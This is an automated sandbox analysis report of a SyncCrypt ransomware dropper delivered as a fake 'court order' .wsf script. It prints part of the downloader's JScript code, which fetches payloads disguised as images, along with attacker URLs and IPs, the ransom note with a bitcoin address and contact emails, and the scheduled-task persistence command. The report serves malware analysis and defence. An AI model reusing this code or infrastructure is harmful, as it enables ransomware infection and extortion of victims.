Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:348744
Start time:11:20:02
Joe Sandbox Product:Cloud
Start date:23.08.2017
Overall analysis duration:0h 11m 48s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:CourtOrder_845493809.wsf
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection:MAL
Classification:mal96.evad.rans.winWSF@16/7@4/4
HCA Information:
  • Successful, ratio: 90%
  • Number of executed functions: 11
  • Number of non-executed functions: 110
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20000ms are automatically reduced to 500ms
  • Found application associated with file extension: .wsf
Warnings:
Show All
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, taskeng.exe, conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold960 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpgvirustotal: 18/58 detections: Emsisoft: Trojan.Ransom.BTF (B), MicroWorld-eScan: Trojan.Ransom.BTF, McAfee-GW-Edition: SyncCrypt!Zip, GData: Trojan.Ransom.BTF, Sophos: Troj/SyncCt-A, McAfee: SyncCrypt!Zip, TrendMicro: TROJ_RANSOMNOTE.AUSTYV, Cyren: JPG/SyncCrypt.A, Symantec: Trojan.Randsom.A, BitDefender: Trojan.Ransom.BTF, TrendMicro-HouseCall: TROJ_RANSOMNOTE.AUSTYV, Arcabit: Trojan.Ransom.BTF, ViRobot: JPG.S.SyncCrypt.1040099, Ikarus: Trojan.Ransom, DrWeb: Trojan.Encoder.13697, Ad-Aware: Trojan.Ransom.BTF, AhnLab-V3: BinImage/Synccrypt, F-Secure: Trojan.Ransom.BTFPerma Link
Antivirus detection for submitted fileShow sources
Source: CourtOrder_845493809.wsfvirustotal: 36/58 detections Avast: Other:Malware-gen [Trj], AVG: Other:Malware-gen [Trj], AegisLab: Troj.Script.Agent!c, Qihoo-360: Trojan.Generic, BitDefender: Trojan.Agent.CLKF, Emsisoft: Trojan.Agent.CLKF (B), MicroWorld-eScan: Trojan.Agent.CLKF, McAfee-GW-Edition: JS/Nemucod.xo, Fortinet: JS/Agent.SU!tr, GData: Script.Trojan-Downloader.SyncCrypt.A, Sophos: Mal/Psyme-A, McAfee: JS/Nemucod.xo, TrendMicro: JS_NEMUCOD.ELDSAUJG, Cyren: JS/Agent.SU!Eldorado, Symantec: JS.Downloader, Tencent: Js.Trojan.Raas.Auto, Panda: JS/Downloader.BRW, ZoneAlarm: HEUR:Trojan.Script.Agent.gen, TheHacker: VBS/Psyme, Rising: Trojan.Locky/JS!1.A549 (cloud:pT6AWwtp6PR), F-Prot: JS/Agent.SU!Eldorado, nProtect: Script-JS/W32.SyncCrypt-Downloader, CAT-QuickHeal: JS.Nemucod.EGL, ALYac: Trojan.Downloader.WSF.Agent, NANO-Antivirus: Trojan.Script.Heuristic-js.iacgm, Ad-Aware: Trojan.Agent.CLKF, AhnLab-V3: JS/Downloader, TrendMicro-HouseCall: JS_NEMUCOD.ELDSAUJG, Arcabit: Trojan.Agent.CLKF, Microsoft: TrojanDownloader:JS/Telicodeq.A, ViRobot: WSF.S.DPerma Link

Cryptography:

barindex
Public key (encryption) foundShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO5_2_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO5_2_00405600
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO5_1_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO5_1_00405600
Source: sync.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdA UL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4 ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhU YQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Windows\System32\wscript.exeFile dropped: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html -> decryption sofware requires that you send <em>exactly the ammount of bitcoin (without the transaction fee)</em> that is written within the text file to the following address:<br><br><ul><li><em>15lk2bqxj2mjgzz3kcui3b4c42cqkkmqzk</em></li></ul><br>note that if the ammount sent doesn't match exactly the ammount in the text file, you will not receive the sofware, as it's the only way to validate and confirm the payment.<br><br><li>after the payment is done, send an email to all of the following addresses <a href="mailto:getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com">getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com</a> containg:</li><ul><li><em>the file named key, located within the readme folder on your desktop, as an attachment</em> - this file is a locked version of the decryption key (that must be unlocked by us), used to recover your files. do not delete it if

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 4x nop then sub esp, 1Ch5_2_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_0045BED7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 4x nop then sub esp, 1Ch5_1_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_1_0045BED7

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /X8IOl.jpg HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: curl/7.51.0Host: sm.uploads.im
Source: global trafficHTTP traffic detected: GET /mxRqXF/arrival.jpg HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: curl/7.51.0Host: image.ibb.co
Found strings which match to known social media urlsShow sources
Source: wscript.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: image.ibb.co
Urls found in memory or binary dataShow sources
Source: wscript.exeString found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipe
Source: wscript.exeString found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipu
Source: wscript.exeString found in binary or memory: file:///c:/users/user/desktop/courtorder_845493809.wsf
Source: wscript.exe, CourtOrder_845493809.wsfString found in binary or memory: http://185.10.202.115/images/arrival.jpg
Source: wscript.exeString found in binary or memory: http://185.10.202.115/images/arrival.jpgo
Source: wscript.exeString found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: wscript.exeString found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: wscript.exeString found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: wscript.exeString found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: wscript.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: sync.exeString found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net0d
Source: wscript.exe, CourtOrder_845493809.wsfString found in binary or memory: http://sm.uploads.im/x8iol.jpg
Source: wscript.exeString found in binary or memory: http://uploads.im/
Source: wscript.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sync.exeString found in binary or memory: http://www.openssl.org/support/faq.html
Source: sync.exeString found in binary or memory: http://www.openssl.org/support/faq.htmlrand
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: wscript.exeString found in binary or memory: http://www.usertrust.com1
Source: wscript.exeString found in binary or memory: https://ibb.co/
Source: wscript.exe, CourtOrder_845493809.wsfString found in binary or memory: https://image.ibb.co/mxrqxf/arrival.jpg
Source: wscript.exeString found in binary or memory: https://secure.comodo.com/cps0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00

Stealing of Sensitive Information:

barindex
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\cmd.exeDirectory queried: number of queries: 1045

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe
Installs new ROOT certificatesShow sources
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_00401500
PE file contains sections with non-standard namesShow sources
Source: sync.exe.0.drStatic PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00404A24 push eax; mov dword ptr [esp], 00000000h5_2_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_0057150F push ecx; mov dword ptr [esp], ebx5_2_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401630 push eax; mov dword ptr [esp], 00000BB8h5_2_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401630 push eax; mov dword ptr [esp], ebx5_2_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00535FC0 push eax; mov dword ptr [esp], ebx5_2_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00536D40 push eax; mov dword ptr [esp], ebx5_2_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00537310 push eax; mov dword ptr [esp], ebx5_2_0053760F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_004E42D0 push eax; mov dword ptr [esp], esi5_2_004E4345
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00404A24 push eax; mov dword ptr [esp], 00000000h5_1_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_0057150F push ecx; mov dword ptr [esp], ebx5_1_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00401630 push eax; mov dword ptr [esp], 00000BB8h5_1_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00401630 push eax; mov dword ptr [esp], ebx5_1_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00535FC0 push eax; mov dword ptr [esp], ebx5_1_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00536D40 push eax; mov dword ptr [esp], ebx5_1_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00537310 push eax; mov dword ptr [esp], ebx5_1_0053760F

Spreading:

barindex
Contains functionality to query local drivesShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system,5_2_00401630
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\cmd.exeDirectory queried: number of queries: 1045

System Summary:

barindex
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Classification labelShow sources
Source: classification engineClassification label: mal96.evad.rans.winWSF@16/7@4/4
Creates files inside the user directoryShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeFile created: C:\Users\user\desktop\README\
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg
Found command line outputShow sources
Source: C:\Windows\System32\schtasks.exeConsole Write: ........a..u..0.............t...............................`.N...8...:...:.....P.#...N.........d.#..........WgZ..#.G..v
Source: C:\Windows\System32\cmd.exeConsole Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V..J ...........p..........uD...4...`.....,.....
Source: C:\Windows\System32\cmd.exeConsole Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V.DJt.!...........!........u..!.4...`.....,.....
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: CourtOrder_845493809.wsfVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf'
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: unknownProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c net view
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00413910 appears 113 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00414410 appears 267 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00406EA0 appears 60 times
